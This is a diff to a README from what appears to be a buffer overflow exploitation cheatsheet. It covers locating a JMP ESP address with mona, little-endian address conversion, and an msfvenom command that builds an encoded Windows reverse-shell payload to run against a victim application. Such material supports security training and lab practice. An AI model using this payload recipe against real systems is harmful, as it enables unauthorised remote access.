v0nzy/Buffer-Overflow-Cheatsheet/README.md

 ## JMP ESP

 After filtering out the badchars of the application, we will idenfitfy the equivalent for the OPCODE JMP ESP for change the flow of the application to run our shellcode rewriting the stack from its base (EBP).
-To find the equivalent of the OPCODE JMP ESP we can use the following command:`!mona -r esp -cpb "\x00"`
+To find the equivalent of the OPCODE JMP ESP we can use the following command: `!mona -r esp -cpb "\x00"`

-After finding the EBP adress we need to convert this adress to littl-endian format to use it in our code.
-Like this:
+After finding the EBP adress we need to convert this adress to littl-endian format to use it in our code like this:

 `0x0804197R <-> "\x7R\x19\x04\x08"`

 ## Exploitation

-A
+We can now generator our payload to run against our victim machine inserting the badchars we found using mona.
+`msfvenom -p windows/shell_reverse_tcp LHOST=LOCAL_IP LPORT=LOCAL_PORT EXITFUNC=thread -f c –e x86/shikata_ga_nai -b "\x00\x0a"`

+The EXITFUNC=thread prevents the shellcode from crashing the application when executing our shellcode.

+Now just insert the out in the exploit.py script and run it against the application to get a reverse shell.
+Dont forget to open a listener!